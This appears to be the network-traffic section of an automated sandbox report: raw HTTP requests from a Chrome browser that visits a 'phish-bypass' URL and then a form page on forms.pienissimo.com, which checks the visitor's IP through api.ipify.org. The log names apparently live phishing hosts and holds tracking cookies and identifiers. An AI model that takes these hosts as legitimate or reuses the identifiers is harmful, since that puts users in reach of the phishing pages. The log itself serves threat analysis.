    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQi5ys0BCMfRzQEIidPNAQjc080BCMvWzQEI9NbNAQiK180BCKfYzQEI+cDUFRi60s0BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQi5ys0BCMfRzQEIidPNAQjc080BCMvWzQEI9NbNAQiK180BCKfYzQEI+cDUFRi60s0BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922003-0.0.1.1-%2Fmima.mp4 HTTP/1.1Host: t3.awagama.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: t3.awagama.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://t3.awagama.org/cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922003-0.0.1.1-%2Fmima.mp4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?hash=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&id=Fl7E3J HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /clmap/99162160?page-url=https%3A%2F%2Fwww.cipassoitalia.it%2F&pointer-click=rn%3A285429440%3Ax%3A40686%3Ay%3A10485%3At%3A658%3Ap%3A%3BAAA%C2%84AA%C2%89AAAA%3AX%3A659%3AY%3A821&browser-info=u%3A1735921984342483081%3Av%3A1551%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Arqnl%3A1%3Ast%3A1735922050&t=gdpr(14)ti(1) HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.cipassoitalia.itSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yashr=2978277861735921985; yabs-sid=814606481735921986; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzMiIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzIiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzMiIi; sync_cookie_csrf=962763166fake; yandexuid=5258352291735921983; yuidss=5258352291735921983; i=MWn/b3CGBdGz4xwo6ybs8zuB0m6dqTWEZs6SfrZEPLGuS1njVyPf5dksYDS0w6MqEEVqybkB7y6BVJBOmOuiQIuKgyY=; sync_cookie_ok=synced; yp=1736008391.yu.5258352291735921983; ymex=1738513991.oyu.5258352291735921983#1767457986.yrts.1735921986
    Source: global trafficHTTP traffic detected: GET /assets/css/magiczoomplus/magiczoomplus.css HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://forms.pienissimo.com/?hash=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&id=Fl7E3JAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ngx-bootstrap/datepicker/bs-datepicker.css HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://forms.pienissimo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /styles.8e337ad5ac7530eb68dc.css HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://forms.pienissimo.com/?hash=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&id=Fl7E3JAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/css/magiczoomplus/magiczoomplus.js HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://forms.pienissimo.com/?hash=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&id=Fl7E3JAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /runtime-es2015.66c79b9d36e7169e27b0.js HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://forms.pienissimo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://forms.pienissimo.com/?hash=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&id=Fl7E3JAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /polyfills-es2015.6022d6f28e0500e60d30.js HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://forms.pienissimo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://forms.pienissimo.com/?hash=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&id=Fl7E3JAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /main-es2015.d19a2a9abbf7534a8995.js HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://forms.pienissimo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://forms.pienissimo.com/?hash=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&id=Fl7E3JAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /clmap/99162160?page-url=https%3A%2F%2Fwww.cipassoitalia.it%2F&pointer-click=rn%3A285429440%3Ax%3A40686%3Ay%3A10485%3At%3A658%3Ap%3A%3BAAA%C2%84AA%C2%89AAAA%3AX%3A659%3AY%3A821&browser-info=u%3A1735921984342483081%3Av%3A1551%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Arqnl%3A1%3Ast%3A1735922050&t=gdpr(14)ti(1) HTTP/1.1Host: mc.yandex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yashr=2978277861735921985; yabs-sid=814606481735921986; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzMiIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzIiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzMiIi; sync_cookie_csrf=962763166fake; yandexuid=5258352291735921983; yuidss=5258352291735921983; i=MWn/b3CGBdGz4xwo6ybs8zuB0m6dqTWEZs6SfrZEPLGuS1njVyPf5dksYDS0w6MqEEVqybkB7y6BVJBOmOuiQIuKgyY=; sync_cookie_ok=synced; yp=1736008391.yu.5258352291735921983; ymex=1738513991.oyu.5258352291735921983#1767457986.yrts.1735921986
    Source: global trafficHTTP traffic detected: GET /ngx-bootstrap@19.0.1/datepicker/bs-datepicker.css HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://forms.pienissimo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /runtime-es2015.66c79b9d36e7169e27b0.js HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /polyfills-es2015.6022d6f28e0500e60d30.js HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/css/magiczoomplus/magiczoomplus.js HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /scripts.b5b418b830aaccc72e6a.js HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://forms.pienissimo.com/?hash=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&id=Fl7E3JAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://forms.pienissimo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pattern.385356b129fcfde56de8.jpg HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /scripts.b5b418b830aaccc72e6a.js HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pattern.385356b129fcfde56de8.jpg HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /main-es2015.d19a2a9abbf7534a8995.js HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?format=json&doNotCheckUser=true HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://forms.pienissimo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://forms.pienissimo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fr.b377e77885d6a93660dc.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /de.6435bf24d148ca7248e7.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /nl.cfe72ae0b3d6d8485234.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cz.5a24757d105fbe7a4e81.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ru.7e04b988972d41f5c369.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /hr.89b8c8af46eef412f1cd.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/styles.8e337ad5ac7530eb68dc.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /open/getFormsAuthV2/?hashform=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&doNotCheckUser=true HTTP/1.1Host: enginev2.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://forms.pienissimo.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://forms.pienissimo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?format=json&doNotCheckUser=true HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/js/main.js?_=1735922053693 HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://forms.pienissimo.com/?hash=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&id=Fl7E3JAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fr.b377e77885d6a93660dc.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /de.6435bf24d148ca7248e7.svg HTTP/1.1Host: forms.pienissimo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: forms.pienissimo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://forms.pienissimo.com/?hash=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&id=Fl7E3JAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
